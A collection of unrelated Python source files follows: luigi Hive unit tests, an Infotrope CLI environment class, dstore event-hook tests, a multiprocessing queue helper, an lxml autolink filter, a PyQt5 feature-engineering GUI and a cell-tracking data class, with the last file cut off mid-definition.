# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import tempfile
from helpers import unittest
from luigi import six
import luigi.contrib.hive
import mock
from luigi import LocalTarget
class HiveTest(unittest.TestCase):
count = 0
def mock_hive_cmd(self, args, check_return=True):
self.last_hive_cmd = args
self.count += 1
return "statement{0}".format(self.count)
def setUp(self):
self.run_hive_cmd_saved = luigi.contrib.hive.run_hive
luigi.contrib.hive.run_hive = self.mock_hive_cmd
def tearDown(self):
luigi.contrib.hive.run_hive = self.run_hive_cmd_saved
def test_run_hive_command(self):
pre_count = self.count
res = luigi.contrib.hive.run_hive_cmd("foo")
self.assertEqual(["-e", "foo"], self.last_hive_cmd)
self.assertEqual("statement{0}".format(pre_count + 1), res)
def test_run_hive_script_not_exists(self):
def test():
luigi.contrib.hive.run_hive_script("/tmp/some-non-existant-file______")
self.assertRaises(RuntimeError, test)
def test_run_hive_script_exists(self):
with tempfile.NamedTemporaryFile(delete=True) as f:
pre_count = self.count
res = luigi.contrib.hive.run_hive_script(f.name)
self.assertEqual(["-f", f.name], self.last_hive_cmd)
self.assertEqual("statement{0}".format(pre_count + 1), res)
def test_create_parent_dirs(self):
dirname = "/tmp/hive_task_test_dir"
class FooHiveTask(object):
def output(self):
return LocalTarget(os.path.join(dirname, "foo"))
runner = luigi.contrib.hive.HiveQueryRunner()
runner.prepare_outputs(FooHiveTask())
self.assertTrue(os.path.exists(dirname))
class HiveCommandClientTest(unittest.TestCase):
"""Note that some of these tests are really for the CDH releases of Hive, to which I do not currently have access.
Hopefully there are no significant differences in the expected output"""
def setUp(self):
self.client = luigi.contrib.hive.HiveCommandClient()
self.apacheclient = luigi.contrib.hive.ApacheHiveCommandClient()
self.metastoreclient = luigi.contrib.hive.MetastoreClient()
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_default_table_location(self, run_command):
run_command.return_value = "Protect Mode: None \n" \
"Retention: 0 \n" \
"Location: hdfs://localhost:9000/user/hive/warehouse/mytable \n" \
"Table Type: MANAGED_TABLE \n"
returned = self.client.table_location("mytable")
self.assertEqual('hdfs://localhost:9000/user/hive/warehouse/mytable', returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_table_exists(self, run_command):
run_command.return_value = "OK"
returned = self.client.table_exists("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"mytable"
returned = self.client.table_exists("mytable")
self.assertTrue(returned)
# Issue #896 test case insensitivity
returned = self.client.table_exists("MyTable")
self.assertTrue(returned)
run_command.return_value = "day=2013-06-28/hour=3\n" \
"day=2013-06-28/hour=4\n" \
"day=2013-07-07/hour=2\n"
self.client.partition_spec = mock.Mock(name="partition_spec")
self.client.partition_spec.return_value = "somepart"
returned = self.client.table_exists("mytable", partition={'a': 'b'})
self.assertTrue(returned)
run_command.return_value = ""
returned = self.client.table_exists("mytable", partition={'a': 'b'})
self.assertFalse(returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_table_schema(self, run_command):
run_command.return_value = "FAILED: SemanticException [Error 10001]: blah does not exist\nSome other stuff"
returned = self.client.table_schema("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"col1 string None \n" \
"col2 string None \n" \
"col3 string None \n" \
"day string None \n" \
"hour smallint None \n\n" \
"# Partition Information \n" \
"# col_name data_type comment \n\n" \
"day string None \n" \
"hour smallint None \n" \
"Time taken: 2.08 seconds, Fetched: 34 row(s)\n"
expected = [('OK',),
('col1', 'string', 'None'),
('col2', 'string', 'None'),
('col3', 'string', 'None'),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('',),
('# Partition Information',),
('# col_name', 'data_type', 'comment'),
('',),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('Time taken: 2.08 seconds, Fetched: 34 row(s)',)]
returned = self.client.table_schema("mytable")
self.assertEqual(expected, returned)
def test_partition_spec(self):
returned = self.client.partition_spec({'a': 'b', 'c': 'd'})
self.assertEqual("`a`='b',`c`='d'", returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_apacheclient_table_exists(self, run_command):
run_command.return_value = "OK"
returned = self.apacheclient.table_exists("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"mytable"
returned = self.apacheclient.table_exists("mytable")
self.assertTrue(returned)
# Issue #896 test case insensitivity
returned = self.apacheclient.table_exists("MyTable")
self.assertTrue(returned)
run_command.return_value = "day=2013-06-28/hour=3\n" \
"day=2013-06-28/hour=4\n" \
"day=2013-07-07/hour=2\n"
self.apacheclient.partition_spec = mock.Mock(name="partition_spec")
self.apacheclient.partition_spec.return_value = "somepart"
returned = self.apacheclient.table_exists("mytable", partition={'a': 'b'})
self.assertTrue(returned)
run_command.return_value = ""
returned = self.apacheclient.table_exists("mytable", partition={'a': 'b'})
self.assertFalse(returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_apacheclient_table_schema(self, run_command):
run_command.return_value = "FAILED: SemanticException [Error 10001]: Table not found mytable\nSome other stuff"
returned = self.apacheclient.table_schema("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"col1 string None \n" \
"col2 string None \n" \
"col3 string None \n" \
"day string None \n" \
"hour smallint None \n\n" \
"# Partition Information \n" \
"# col_name data_type comment \n\n" \
"day string None \n" \
"hour smallint None \n" \
"Time taken: 2.08 seconds, Fetched: 34 row(s)\n"
expected = [('OK',),
('col1', 'string', 'None'),
('col2', 'string', 'None'),
('col3', 'string', 'None'),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('',),
('# Partition Information',),
('# col_name', 'data_type', 'comment'),
('',),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('Time taken: 2.08 seconds, Fetched: 34 row(s)',)]
returned = self.apacheclient.table_schema("mytable")
self.assertEqual(expected, returned)
@mock.patch("luigi.contrib.hive.HiveThriftContext")
def test_metastoreclient_partition_existence_regardless_of_order(self, thrift_context):
thrift_context.return_value = thrift_context
client_mock = mock.Mock(name="clientmock")
client_mock.return_value = client_mock
thrift_context.__enter__ = client_mock
client_mock.get_partition_names = mock.Mock(return_value=["p1=x/p2=y", "p1=a/p2=b"])
partition_spec = OrderedDict([("p1", "a"), ("p2", "b")])
self.assertTrue(self.metastoreclient.table_exists("table", "default", partition_spec))
partition_spec = OrderedDict([("p2", "b"), ("p1", "a")])
self.assertTrue(self.metastoreclient.table_exists("table", "default", partition_spec))
def test_metastore_partition_spec_has_the_same_order(self):
partition_spec = OrderedDict([("p1", "a"), ("p2", "b")])
spec_string = luigi.contrib.hive.MetastoreClient().partition_spec(partition_spec)
self.assertEqual(spec_string, "p1=a/p2=b")
partition_spec = OrderedDict([("p2", "b"), ("p1", "a")])
spec_string = luigi.contrib.hive.MetastoreClient().partition_spec(partition_spec)
self.assertEqual(spec_string, "p1=a/p2=b")
@mock.patch("luigi.configuration")
def test_client_def(self, hive_syntax):
hive_syntax.get_config.return_value.get.return_value = "cdh4"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.HiveCommandClient, type(client))
hive_syntax.get_config.return_value.get.return_value = "cdh3"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.HiveCommandClient, type(client))
hive_syntax.get_config.return_value.get.return_value = "apache"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.ApacheHiveCommandClient, type(client))
hive_syntax.get_config.return_value.get.return_value = "metastore"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.MetastoreClient, type(client))
@mock.patch('subprocess.Popen')
def test_run_hive_command(self, popen):
# I'm testing this again to check the return codes
# I didn't want to tear up all the existing tests to change how run_hive is mocked
comm = mock.Mock(name='communicate_mock')
comm.return_value = "some return stuff", ""
preturn = mock.Mock(name='open_mock')
preturn.returncode = 0
preturn.communicate = comm
popen.return_value = preturn
returned = luigi.contrib.hive.run_hive(["blah", "blah"])
self.assertEqual("some return stuff", returned)
preturn.returncode = 17
self.assertRaises(luigi.contrib.hive.HiveCommandError, luigi.contrib.hive.run_hive, ["blah", "blah"])
comm.return_value = "", "some stderr stuff"
returned = luigi.contrib.hive.run_hive(["blah", "blah"], False)
self.assertEqual("", returned)
class MyHiveTask(luigi.contrib.hive.HiveQueryTask):
param = luigi.Parameter()
def query(self):
return 'banana banana %s' % self.param
class TestHiveTask(unittest.TestCase):
task_class = MyHiveTask
@mock.patch('luigi.contrib.hadoop.run_and_track_hadoop_job')
def test_run(self, run_and_track_hadoop_job):
success = luigi.run([self.task_class.__name__, '--param', 'foo', '--local-scheduler', '--no-lock'])
self.assertTrue(success)
self.assertEqual('hive', run_and_track_hadoop_job.call_args[0][0][0])
class MyHiveTaskArgs(MyHiveTask):
def hivevars(self):
return {'my_variable1': 'value1', 'my_variable2': 'value2'}
def hiveconfs(self):
return {'hive.additional.conf': 'conf_value'}
class TestHiveTaskArgs(TestHiveTask):
task_class = MyHiveTaskArgs
def test_arglist(self):
task = self.task_class(param='foo')
f_name = 'my_file'
runner = luigi.contrib.hive.HiveQueryRunner()
arglist = runner.get_arglist(f_name, task)
f_idx = arglist.index('-f')
self.assertEqual(arglist[f_idx + 1], f_name)
hivevars = ['{}={}'.format(k, v) for k, v in six.iteritems(task.hivevars())]
for var in hivevars:
idx = arglist.index(var)
self.assertEqual(arglist[idx - 1], '--hivevar')
hiveconfs = ['{}={}'.format(k, v) for k, v in six.iteritems(task.hiveconfs())]
for conf in hiveconfs:
idx = arglist.index(conf)
self.assertEqual(arglist[idx - 1], '--hiveconf')
class TestHiveTarget(unittest.TestCase):
def test_hive_table_target(self):
client = mock.Mock()
target = luigi.contrib.hive.HiveTableTarget(database='db', table='foo', client=client)
target.exists()
client.table_exists.assert_called_with('foo', 'db')
def test_hive_partition_target(self):
client = mock.Mock()
target = luigi.contrib.hive.HivePartitionTarget(database='db', table='foo', partition='bar', client=client)
target.exists()
client.table_exists.assert_called_with('foo', 'db', 'bar')
|
#
# Copyright 2004 - 2006 Dave Cridland <dave@cridland.net>
#
# This file forms part of the Infotrope Python Library.
#
# The Infotrope Python Library is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# The Infotrope Python Library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the Infotrope Python Library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
class caller:
def __init__( self, callee, *args, **kw ):
self.callee = callee
self.args = args
self.kw = kw
def __call__( self ):
self.callee( *self.args, **self.kw )
self.callee = None
self.args = None
self.kw = None
class environment:
def __init__( self, logging=False, protologging=None ):
self.logging = logging
self.protologging = protologging
if self.protologging is None:
self.protologging = self.logging
self.sock_delay = None
self.sock_bandwidth = None
self.sock_readable = None
self.sock_writable = None
self.defcall = False
def defer_call( self, obj, *args, **kw ):
obj( *args, **kw )
def callback( self, mech, vals ):
raise "__ABSTRACT__"
def logger( self, *txt ):
pass
def proto_logger( self, uri, time, txt ):
self.logger( str(uri), str(time), str(txt) )
def alert( self, uri, text ):
raise "__ABSTRACT__"
def secquery( self, mech, question ):
raise "__ABSTRACT__"
def status( self, text ):
pass
def make_operation( self, title, status=None, pmax=None ):
return None
class cli_environment(environment):
def __init__( self, logging=False, protologging=None ):
environment.__init__( self, logging, protologging )
def callback( self, mech, vals ):
print "Need user information for",mech.mechname,"login to",mech.sasl.service,"on",mech.uri().server
import getpass
for x,v in vals.items():
if x == 'password':
vals[x] = getpass.getpass( 'Password: ' )
else:
vals[x] = raw_input( x+': ' )
return vals
def logger( self, *txt ):
print "LOG : ",`txt`
def alert( self, uri, text ):
print "** Alert from %s!" % uri
print " %s" % text
def secquery( self, mech, question ):
print "Security Question\n%s" % question
a = raw_input( "y/N?" )
if a and a[0].upper() == 'Y':
return True
return False
def status( self, text ):
if self.logging:
self.logger( text )
|
from nose.tools import eq_, raises
from . import BaseTest, Car
from dstore.Error import EventNotFound, EventListenerNotFound, InstanceNotFound
class CancelAdd( BaseTest ):
def before_addd( self, event, model, instance ):
self.action = True
event.cancel()
def test( self ):
Car.events.before_add += self.before_addd
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
Car.events.before_add -= self.before_addd
self.assertRaises( InstanceNotFound, Car.get, 0 )
eq_( self.action, True, "before_add was not executed" )
class Add( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test(self):
Car.events.before_add += self.before_action
Car.events.after_add += self.after_action
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
eq_( issubclass( self.before[0], Car ), True, "before_add was not executed (Model != Car)")
eq_( isinstance( self.before[1], Car ), True, "before_add was not executed (Instance not a Car)")
eq_( issubclass( self.after[0], Car ), True, "after_add was not executed (Model != Car)")
eq_( isinstance( self.after[1], Car ), True, "after_add was not executed (Instance not a Car)")
class Delete( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test(self):
Car.events.before_delete += self.before_action
Car.events.after_delete += self.after_action
car = Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
car.delete()
eq_( issubclass( self.before[0], Car ), True, "before_delete was not executed (Model != Car)")
eq_( isinstance( self.before[1], Car ), True, "before_delete was not executed (Instance not a Car)")
eq_( issubclass( self.after[0], Car ), True, "after_delete was not executed (Model != Car)")
eq_( isinstance( self.after[1], Car ), True, "after_delete was not executed (Instance not a Car)")
class Update( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test(self):
Car.events.before_update += self.before_action
Car.events.after_update += self.after_action
car = Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
car.year = 2016
car.update()
eq_( issubclass( self.before[0], Car ), True, "before_update was not executed (Model != Car)")
eq_( isinstance( self.before[1], Car ), True, "before_update was not executed (Instance not a Car)")
eq_( issubclass( self.after[0], Car ), True, "after_update was not executed (Model != Car)")
eq_( isinstance( self.after[1], Car ), True, "after_update was not executed (Instance not a Car)")
class All( BaseTest ):
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model, instances ):
self.after = ( model, instances )
def test( self ):
Car.events.before_all += self.before_action
Car.events.after_all += self.after_action
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2006 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2007 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2008 ).add()
Car.all()
eq_( issubclass( self.before, Car ), True, "before_all was not executed (Model != Car)" )
eq_( issubclass( self.after[0], Car ), True, "after_all was not execute (Model != Car)" )
eq_( isinstance( self.after[1], list ), True, "after_all was not execute (Instance != List)" )
eq_( isinstance( self.after[1][0], Car), True, "after_all was not execute (Instance[0] != Car)" )
class Get( BaseTest ):
def before_action( self, event, model, row_id ):
self.before = ( model, row_id )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test( self ):
Car.events.before_get += self.before_action
Car.events.after_get += self.after_action
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2006 ).add()
Car.get( 1 )
eq_( issubclass( self.before[0], Car ), True, "before_get was not executed (Model != Car)" )
eq_( self.before[1], 1, "before_get was not executed (row_id != 1)" )
eq_( issubclass( self.after[0], Car ), True, "after_get was not executed (Model != Car)" )
eq_( isinstance( self.after[1], Car ), True, "after_get was not executed (Instance != Car)" )
eq_( self.after[1].year, 2005, "after_get was not executed (Instance.year != 2006)" )
class Empty( BaseTest ):
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model ):
self.after = model
def test( self ):
Car.events.before_empty += self.before_action
Car.events.after_empty += self.after_action
Car(manufacturer="Holden", make="Commodore", year=2005).add()
Car(manufacturer="Holden", make="Commodore", year=2006).add()
Car.empty()
eq_( issubclass( self.before, Car ), True, "before_empty was not executed (Model != Car)" )
eq_( issubclass( self.after, Car ), True, "after_empty was not execute (Model != Car)" )
class Create( BaseTest ):
auto_create = False
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model ):
self.after = model
def test( self ):
Car.events.before_create += self.before_action
Car.events.after_create += self.after_action
Car.create()
Car.destroy()
eq_( issubclass( self.before, Car), True, "before_create was not execute (Model != Car)" )
eq_( issubclass( self.after, Car ), True, "after_create was not execute (Model != Car" )
class Destroy( BaseTest ):
auto_create = False
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model ):
self.after = model
def test( self ):
Car.events.before_destroy += self.before_action
Car.events.after_destroy += self.after_action
Car.create()
Car.destroy()
eq_( issubclass( self.before, Car ), True, "before_destroy was not execute (Model != Car)" )
eq_( issubclass( self.after, Car ), True, "after_destroy was not execute (Model != Car" )
class Filter( BaseTest ):
def before_action( self, event, model, params ):
self.before = ( model, params )
def after_action( self, event, model, instances, params ):
self.after = ( model, instances, params )
def test( self ):
Car.events.before_filter += self.before_action
Car.events.after_filter += self.after_action
Car(manufacturer="Holden", make="Commodore", year=2005).add()
Car(manufacturer="Holden", make="Commodore", year=2006).add()
Car(manufacturer="Holden", make="Rodeo", year=2007).add()
Car(manufacturer="Holden", make="Colorado", year=2008).add()
cars = Car.filter( make = "Commodore" )
eq_( issubclass( self.before[0], Car ), True, "before_filter was not executed (Model != Car)" )
eq_( isinstance( self.before[1], dict ), True, "before_filter was not executed (Params != Dict)" )
eq_( self.before[1][ "make" ], "Commodore", "before_filter was not executed (Params['make'] != 'Commodore'" )
eq_( issubclass( self.after[0], Car ), True, "after_filter was not executed (Model != Car)" )
eq_( isinstance( self.after[1], list ), True, "after_filter was not executed (Instances != List)" )
eq_( isinstance( self.after[1][0], Car ), True, "after_filter was not executed (Instances[0] != Car)" )
eq_( isinstance( self.after[2], dict ), True, "after_filter was not executed (Params != Dict)" )
eq_( self.after[2][ "make" ], "Commodore", "after_filter was not executed (Params['make'] != 'Commodore'" )
class Validate( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test( self ):
Car.events.before_validate += self.before_action
Car.events.after_validate += self.after_action
Car(manufacturer="Holden", make="Commodore", year=2005).add()
eq_( issubclass( self.before[0], Car ), True, "before_validate was not executed (Model != Car)" )
eq_( isinstance( self.before[1], Car ), True, "before_validate was not executed (Instance != Car)" )
eq_( issubclass( self.after[0], Car ), True, "after_validate was not executed (Model != Car)" )
eq_( isinstance( self.after[1], Car ), True, "after_validate was not executed (Instance != Car)" )
|
#!/usr/bin/env python
""" Implementation of asynchronous pipe that easy to use for parallel
calculations.
FastQueueProcessor -- implementation """
__author__ = "Yaroslav Litvinov"
__copyright__ = "Copyright 2016, Rackspace Inc."
__email__ = "yaroslav.litvinov@rackspace.com"
from multiprocessing import Process
from multiprocessing import Pipe
from collections import namedtuple
from collections import deque
_EOF = 'EOF'
_ERROR_OCCURED = "OpMultiprocessingErrorOccured"
def _worker(pipes):
""" worker wrapper to be used with FastQueueProcessor
pipes -- tuple with (read, write) pipes"""
pipe_work, pipe_main = pipes
worker_func = None
worker_1st_arg = None
while True:
try:
if not worker_func:
worker_func = pipe_work.recv()
worker_1st_arg = pipe_work.recv()
else:
# Read from the output pipe and do nothing
arg = pipe_work.recv()
# close pipe if 'EOF' received
if arg == _EOF:
pipe_work.close()
pipe_main.close()
break
else:
res = worker_func(worker_1st_arg, arg) #pylint: disable=E1102
pipe_work.send(res)
except EOFError:
break
except:
pipe_work.send(_ERROR_OCCURED)
raise
def _create_worker_proccess(worker, worker_1st_arg):
""" Launch worker process and send via pipe a worker function 'worker'
and initial argument 'worker_1st_arg'. Return worker descriptor.
worker -- worker function is expected to have two arguments :
1st - initial data, 2nd - data object for processing.
It must return result of data processing.
worker_1st_arg -- initial arg to worker function"""
pipe_work, pipe_main = Pipe()
proc = Process(target=_worker, args=((pipe_work, pipe_main), ))
proc.start()
pipe_main.send(worker)
pipe_main.send(worker_1st_arg)
return FastQueueProcessor.FastProc(pipe_work=pipe_work,
pipe_main=pipe_main,
proc=proc)
class FastQueueProcessor:
""" Implementation of asynchronous pipe that easy to use for parallel
calculations. Write data into pipe then read from pipe result of data
processeing. Supports multiple parallel workers which are competing for
data in queue. First read first serve."""
FastProc = namedtuple('FastProc', ['pipe_work', 'pipe_main', 'proc'])
def __init__(self, worker, worker_1st_arg, procn):
self.queue_data = deque()
self.procs = [_create_worker_proccess(worker, worker_1st_arg) \
for _ in xrange(procn)]
self.proc_statuses = [False for i in xrange(procn)]
self.error = False
def _consume_from_queue(self):
""" try to consume data from queue by all available workers
which are ready to consume data """
for i in xrange(len(self.proc_statuses)):
if not self.count():
break
status = self.proc_statuses[i]
if not status:
data = self.queue_data.popleft()
self.procs[i].pipe_main.send(data)
self.proc_statuses[i] = True
def is_any_working(self):
""" return True if any worker is not yet finished data processing """
for status in self.proc_statuses:
if status:
return True
return False
def __del__(self):
""" Send EOF signal to all workers, close pipes and
wait while workers are done."""
for proc in self.procs:
proc.pipe_main.send(_EOF)
proc.pipe_work.close()
proc.pipe_main.close()
proc.proc.join()
def count(self):
""" return data count in queue """
return len(self.queue_data)
def put(self, data):
""" Put data to queue, then try to consume datas from queue
by all available workers which are eager to data"""
self.queue_data.append(data)
self._consume_from_queue()
def poll(self):
""" return True/False is it results available or not """
for proc in self.procs:
if proc.pipe_main.poll():
return True
return False
def get(self):
""" return result available in pipe """
res = None
while True:
if not len(self.queue_data) and not self.is_any_working():
break
for i in xrange(len(self.procs)):
proc = self.procs[i]
if proc.pipe_main.poll():
res = proc.pipe_main.recv()
self.proc_statuses[i] = False
if res == _ERROR_OCCURED:
res = None
self.error = True
break
if res is not None:
break
self._consume_from_queue()
return res
|
# from lxml.html import fromstring, tostring
from lxml.html.clean import autolink_html
def autolink(context={}):
"""The autolink filter automatically add links.
It does this by looking for things that look like links, which includes
anything starting with `http`, `https`, and `mailto` and replaces it
with an anchor element.
"""
def render(content):
return autolink_html(content)
return render
|
# -*- coding: utf-8 -*-
"""The GUI of the feature_engineering module of easylearn
Created on Wed Jul 4 13:57:15 2018
@author: Li Chao
Email:lichao19870617@gmail.com
GitHub account name: lichao312214129
Institution (company): Brain Function Research Section, The First Affiliated Hospital of China Medical University, Shenyang, Liaoning, PR China.
License: MIT
"""
import sys
sys.path.append('../stylesheets/PyQt5_stylesheets')
import os
import json
import cgitb
from PyQt5.QtWidgets import QApplication,QMainWindow, QFileDialog
from PyQt5.QtWidgets import *
from PyQt5 import *
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QApplication,QWidget,QVBoxLayout,QListView,QMessageBox
from PyQt5.QtCore import*
import PyQt5_stylesheets
from easylearn_feature_engineering_gui import Ui_MainWindow
from PyQt5 import QtCore, QtGui, QtWidgets
class EasylearnFeatureEngineeringRun(QMainWindow, Ui_MainWindow):
def __init__(self, working_directory=None):
QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
# intial
# connect main items signal to slot
self.items_stackedwedge_dict = {"Preprocessing": 0, "Dimension reduction": 1, "Feature selection": 2, "Unbalance treatment": 3, "None": 4}
self.pushButton_preprocessing.clicked.connect(self.on_pushButton_items_clicked)
self.pushButton_dimreduction.clicked.connect(self.on_pushButton_items_clicked)
self.pushButton_selection.clicked.connect(self.on_pushButton_items_clicked)
self.pushButton_unbalance_treatment.clicked.connect(self.on_pushButton_items_clicked)
# connect preprocessing setting signal to slot
self.preprocessing_stackedwedge_dict = {"Z-score normalization": 0, "Scaling": 1, "De-mean": 2, "None": 3}
self.radioButton_scaling.clicked.connect(self.on_preprocessing_detail_stackedwedge_clicked)
self.radioButton_zscore.clicked.connect(self.on_preprocessing_detail_stackedwedge_clicked)
self.radioButton_demean.clicked.connect(self.on_preprocessing_detail_stackedwedge_clicked)
# connect dimreduction setting signal to slot
self.dimreduction_stackedwedge_dict = {"PCA": 0, "ICA": 1, "LDA": 2, "LLE": 3, "None": 4}
self.radioButton_pca.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_ica.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_lda.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_lle.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_none.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
# connect feature selection setting signal to slot
self.feature_selection_stackedwedge_dict = {"Variance threshold": 0, "Correlation": 1, "Distance correlation": 2, "F-Score": 3, "Mutual information (classification)": 4}
self.radioButton_variance_threshold.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_correlation.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_distancecorrelation.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_fscore.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_mutualinfo_cls.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
# set appearance
self.set_run_appearance()
def set_run_appearance(self):
"""Set style_sheets
"""
qss_special = """QPushButton:hover
{
font-weight: bold; font-size: 15px;
}
"""
self.setWindowTitle('Feature Engineering')
self.setWindowIcon(QIcon('../logo/logo-upper.jpg'))
sender = self.sender()
if sender:
if (sender.text() in list(self.skins.keys())):
self.setStyleSheet(PyQt5_stylesheets.load_stylesheet_pyqt5(style=self.skins[sender.text()]))
else:
self.setStyleSheet(PyQt5_stylesheets.load_stylesheet_pyqt5(style="style_Dark"))
else:
self.setStyleSheet(PyQt5_stylesheets.load_stylesheet_pyqt5(style="style_Dark"))
# Make the stackedWidg to default at the begining
self.stackedWidget_items.setCurrentIndex(4)
self.on_radioButton_not_scaling_clicked()
def on_pushButton_items_clicked(self):
print(self.sender().text())
self.stackedWidget_items.setCurrentIndex(self.items_stackedwedge_dict[self.sender().text()])
def on_preprocessing_detail_stackedwedge_clicked(self):
print(self.sender().text())
if self.sender().text():
self.stackedWidget_preprocessing_methods.setCurrentIndex(self.preprocessing_stackedwedge_dict[self.sender().text()])
else:
self.stackedWidget_preprocessing_methods.setCurrentIndex(-1)
def on_radioButton_not_scaling_clicked(self):
self.stackedWidget_preprocessing_methods.setCurrentIndex(1)
#%% radioButtons of dimreduction
def on_dimreduction_stackedwedge_clicked(self):
self.stackedWidget_dimreduction.setCurrentIndex(self.dimreduction_stackedwedge_dict[self.sender().text()])
def on_feature_selection_stackedwedge_clicked(self):
self.groupBox_feature_selection_input.setTitle(self.sender().text())
self.stackedWidget_feature_selection.setCurrentIndex(self.feature_selection_stackedwedge_dict[self.sender().text()])
def closeEvent(self, event):
"""This function is called when exit icon of the window is clicked.
This function make sure the program quit safely.
"""
# Set qss to make sure the QMessageBox can be seen
reply = QMessageBox.question(self, 'Quit',"Are you sure to quit?",
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
if __name__ == "__main__":
app=QApplication(sys.argv)
md=EasylearnFeatureEngineeringRun()
md.show()
sys.exit(app.exec_())
|
import numpy as np
from cached_property import cached_property
from .utils import slices_intersection, slices_relative, parse_file_order
class CellOccurence:
def __init__(self, frame_number, cell_id, unique_id, position, colour=0):
"""
All parameters should be greater that zero.
Unique_id == -1 means that there is no tracking data.
colour = 0 - cell
colour != 0 - maybe cell
"""
self.frame_number = parse_file_order(frame_number)
self.cell_id = cell_id
self.unique_id = unique_id
self.position = position
self.colour = colour
self.mask = None
self.mask_slice = None
def get_id(self):
"""Return id of the cell in its frame."""
if (self.unique_id == -1):
return self.cell_id
else:
return self.unique_id
def get_triple(self):
"""Return (cell_id, posx, posy) or (unique_id, posx, posy)."""
return (self.get_id(), self.position[0], self.position[1])
def has_tracking_data(self):
return self.unique_id != -1
def has_contour_data(self):
return self.mask is not None
def obligatory(self):
return self.colour == 0
def distance(self, cell_b):
return ((self.position[0] - cell_b.position[0]) ** 2 + (self.position[1] - cell_b.position[1]) ** 2) ** 0.5
@cached_property
def area(self):
if self.has_contour_data():
return np.count_nonzero(self.mask)
return None
def overlap(self, cell_b):
if self.has_contour_data() and cell_b.has_contour_data():
slices_overlap = slices_intersection(self.mask_slice, cell_b.mask_slice)
if slices_overlap is not None:
slice_relative_1 = slices_relative(self.mask_slice, slices_overlap)
slice_relative_2 = slices_relative(cell_b.mask_slice, slices_overlap)
overlap = self.mask[slice_relative_1] & cell_b.mask[slice_relative_2]
return np.count_nonzero(overlap)
else:
return 0
return None
def iou(self, cell_b):
if self.has_contour_data() and cell_b.has_contour_data():
intersect = float(self.overlap(cell_b))
return intersect / (self.area + cell_b.area - intersect)
return None
def similarity(self, cell_b):
iou_with_b = self.iou(cell_b)
if iou_with_b is not None:
return iou_with_b
else:
return -self.distance(cell_b)
def is_similar(self, cell_b, position_cutoff, iou_cutoff):
iou_with_b = self.iou(cell_b)
if iou_with_b is not None:
return iou_with_b > iou_cutoff
else:
return self.distance(cell_b) < position_cutoff
def __hash__(self):
return hash(self.frame_number) ^ hash(self.get_id()) ^ hash(self.position) ^ hash(self.colour)
def __eq__(self, other):
return self.frame_number == other.frame_number and self.get_id() == other.get_id() and self.position == other.position and self.colour == other.colour
def __str__(self):
